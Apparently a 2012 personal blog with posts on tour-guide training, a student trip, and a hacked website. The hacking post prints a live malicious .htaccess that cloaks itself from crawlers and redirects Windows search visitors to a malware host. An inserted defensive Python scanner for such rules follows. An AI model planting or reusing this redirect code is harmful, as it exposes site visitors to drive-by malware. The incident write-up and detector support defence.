Saturday, April 14, 2012
Training
Today was the first day of the tour guide training that I plan to take part in. The training was interesting, and in my opinion an undertaking like this is only to be welcomed, on both the local and the national scale. I have seen several guides doing their job, and until now my opinion of their work has been that it is a day job done with satisfactory preparation. But hearing now that a guide prepares for a single excursion for up to 2 months, I would currently rate their work as merely poor. Maybe it is a case of pedagogical cretinism, but the impression so far has been that the ladies were picked up from some school corridor, or are first-year students who dropped out of university and are looking for summer work. I hope that the overall level improves through such trainings and brings more curious visitors to Estonia :)
Tuesday, April 10, 2012
Web attacks on the net
On April 6 it so happened that a nice website was shut down by Google. To get the site active again, quite a few things had to be identified. The typical approaches, such as analysing file modification dates, analysing database changes, and reading the page source and CSS, did not give the desired result. The result was still this:
-------------
Safe Browsing
Diagnostic page for aaa.eee.iii.oo
What is the current listing status for aaa.eee.iii.oo?
Site is listed as suspicious - visiting this web site may harm your computer.
Part of this site was listed for suspicious activity 1 time(s) over the past 90 days.
What happened when Google visited this site?
Of the 2 pages we tested on the site over the past 90 days, 2 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 2012-04-09, and the last time suspicious content was found on this site was on 2012-04-09.
Malicious software is hosted on 1 domain(s), including vicandbarbs.net/.
This site was hosted on 1 network(s) including AS49604 (server).
Has this site acted as an intermediary resulting in further distribution of malware?
Over the past 90 days, aaa.eee.iii.oo did not appear to function as an intermediary for the infection of any sites.
Has this site hosted malware?
No, this site has not hosted malicious software over the past 90 days.
How did this happen?
In some cases, third parties can add malicious code to legitimate sites, which would cause us to show the warning message.
Next steps:
Return to the previous page.
If you are the owner of this web site, you can request a review of your site using Google Webmaster Tools. More information about the review process is available in Google's Webmaster Help Center.
-------------
Investigating further, it turned out that there was a gap in the FTP log in February and that .htaccess files had been "updated".
A sample of the file contents:
RewriteEngine On
RewriteCond %{REQUEST_METHOD} ^GET$
RewriteCond %{HTTP_REFERER} ^(http\:\/\/)?([^\/\?]*\.)?(wordpress|twit|tweet|flickr\.|linkedin|google\.|yahoo\.|bing\.|msn\.|ask\.|excite\.|altavista\.|netscape\.|aol\.|hotbot\.|goto\.|infoseek\.|mamma\.|alltheweb\.|lycos\.|metacrawler\.|mail\.|dogpile\?).*$ [NC]
RewriteCond %{HTTP_REFERER} !^.*(imgres\?q).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(bing|Accoona|Ace\sExplorer|Amfibi|Amiga\sOS|apache|appie|AppleSyndication).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Archive|Argus|Ask\sJeeves|asterias|Atrenko\sNews|BeOS|BigBlogZoo).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Biz360|Blaiz|Bloglines|BlogPulse|BlogSearch|BlogsLive|BlogsSay|blogWatcher).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Bookmark|bot|CE\-Preload|CFNetwork|cococ|Combine|Crawl|curl|Danger\shiptop).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Diagnostics|DTAAgent|EmeraldShield|endo|Evaal|Everest\-Vulcan).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(exactseek|Feed|Fetch|findlinks|FreeBSD|Friendster|Fuck\sYou|Google).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Gregarius|HatenaScreenshot|heritrix|HolyCowDude|Honda\-Search|HP\-UX).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(HTML2JPG|HttpClient|httpunit|ichiro|iGetter|iPhone|IRIX|Jakarta|JetBrains).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Krugle|Labrador|larbin|LeechGet|libwww|Liferea|LinkChecker).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(LinknSurf|Linux|LiveJournal|Lonopono|Lotus\-Notes|Lycos|Lynx|Mac\_PowerPC).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Mac\_PPC|Mac\s10|Mac\sOS|macDN|Macintosh|Mediapartners|Megite|MetaProducts).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Miva|Mobile|NetBSD|NetNewsWire|NetResearchServer|NewsAlloy|NewsFire).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(NewsGatorOnline|NewsMacPro|Nokia|NuSearch|Nutch|ObjectSearch|Octora).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(OmniExplorer|Omnipelagos|Onet|OpenBSD|OpenIntelligenceData|oreilly).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(os\=Mac|P900i|panscient|perl|PlayStation|POE\-Component|PrivacyFinder).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(psycheclone|Python|retriever|Rojo|RSS|SBIder|Scooter|Seeker|Series\s60).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(SharpReader|SiteBar|Slurp|Snoopy|Soap\sClient|Socialmarks|Sphere\sScout).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(spider|sproose|Rambler|Straw|subscriber|SunOS|Surfer|Syndic8).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Syntryx|TargetYourNews|Technorati|Thunderbird|Twiceler|urllib|Validator).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Vienna|voyager|W3C|Wavefire|webcollage|Webmaster|WebPatrol|wget|Win\s9x).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Win16|Win95|Win98|Windows\s95|Windows\s98|Windows\sCE|Windows\sNT\s4).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(WinHTTP|WinNT4|WordPress|WWWeasel|wwwster|yacy|Yahoo).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Yandex|Yeti|YouReadMe|Zhuaxia|ZyBorg).*$ [NC]
RewriteCond %{REQUEST_FILENAME} !.*jpg$|.*gif$|.*png|.*jpeg|.*mpg|.*avi|.*zip|.*gz|.*tar|.*ico$ [NC]
RewriteCond %{HTTP_COOKIE} !^.*Ghv.*$ [NC]
RewriteCond %{HTTP_USER_AGENT} .*Windows.* [NC]
RewriteCond %{HTTPS} ^off$
RewriteRule ^(.*)$ http://%{REMOTE_PORT}.vicandbarbs.net/url?sa=N&source=web&cd=38&ved=0JIPpb3px&url=http://%{HTTP_HOST}%{REQUEST_URI}&ei=25cse67K4q28rI2PxlAy95i1pw==&usg=TK5lMYKAuR6UJAfGoXSYHe&sig2=QimcYgrymLdv8rU3AheLQp [R=302,L,CO=Ghv:50:%{HTTP_HOST}:10919:/:0:HttpOnly]
The robot that did this had, over the course of about 2 minutes, added a new file every 5 seconds and then deleted the log. What is more, this activity had taken place in February and the problem appeared 2 months later.
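An added example (not part of the original post): a Python audit that flags the pattern in the file above, namely a RewriteRule that redirects to a foreign host, is gated on Referer/User-Agent/Cookie conditions, and sets a marker cookie. The sample input is constructed, with a placeholder host; `audit_htaccess`, `scan_tree` and `own_hosts` are names chosen for this illustration.

```python
import re
from pathlib import Path

# Constructed sample, shortened from the pattern above; the host is a placeholder.
SAMPLE = r"""RewriteEngine On
RewriteCond %{REQUEST_METHOD} ^GET$
RewriteCond %{HTTP_REFERER} ^(http\:\/\/)?([^\/\?]*\.)?(google\.|yahoo\.|bing\.).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(bot|Crawl|curl|wget).*$ [NC]
RewriteCond %{HTTP_COOKIE} !^.*Ghv.*$ [NC]
RewriteCond %{HTTP_USER_AGENT} .*Windows.* [NC]
RewriteRule ^(.*)$ http://%{REMOTE_PORT}.redirect.example/url?url=http://%{HTTP_HOST}%{REQUEST_URI} [R=302,L,CO=Ghv:50:%{HTTP_HOST}:10919:/:0:HttpOnly]

RewriteCond %{HTTPS} ^off$
RewriteRule ^(.*)$ https://www.mysite.example/$1 [R=301,L]
"""

# Request headers a visitor-selective (cloaked) redirect typically keys on.
CLOAK_VARS = {"HTTP_REFERER", "HTTP_USER_AGENT", "HTTP_COOKIE"}

def audit_htaccess(text, own_hosts=()):
    """Return one finding per RewriteRule that redirects to a host not in own_hosts."""
    findings, cond_vars = [], set()
    for lineno, line in enumerate(text.splitlines(), 1):
        parts = line.split()
        if len(parts) >= 2 and parts[0].lower() == "rewritecond":
            cond_vars.update(re.findall(r"%\{(\w+)\}", parts[1]))
        elif len(parts) >= 3 and parts[0].lower() == "rewriterule":
            target, flags = parts[2], parts[3] if len(parts) > 3 else ""
            m = re.match(r"https?://([^/?]+)", target, re.I)
            if m and m.group(1).lower() not in own_hosts:
                findings.append({
                    "line": lineno,
                    "host": m.group(1),
                    "cloaked_on": sorted(cond_vars & CLOAK_VARS),
                    "sets_cookie": bool(re.search(r"[\[,](?:CO|cookie)=", flags, re.I)),
                })
            cond_vars = set()  # RewriteCond lines apply only to the next RewriteRule
    return findings

def scan_tree(root, own_hosts=()):
    """Audit every .htaccess under root; returns {path: findings} for files with hits."""
    hits = {}
    for path in Path(root).rglob(".htaccess"):
        found = audit_htaccess(path.read_text(errors="replace"), own_hosts)
        if found:
            hits[str(path)] = found
    return hits
```

Run `scan_tree` over the whole web root with the site's own host names (lower-case) in `own_hosts`; a finding with a non-empty `cloaked_on` and `sets_cookie` true matches the file shown above, which is why the site owner browsing directly never saw the redirect.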
About travelling
In the meantime I have travelled in the Netherlands and in Russia (more precisely, in St. Petersburg with students), but that latter undertaking was quite peculiar. 3 young ladies were fined for excessive alcohol consumption, and on the daytime city excursion there was nobody who wanted to look around. An hour before going back to the ship (the end of the free time in the city) everyone was already on the bus, sleeping off their hangover. On the whole, though, the trip can be counted a success, because everyone who went also made it back :)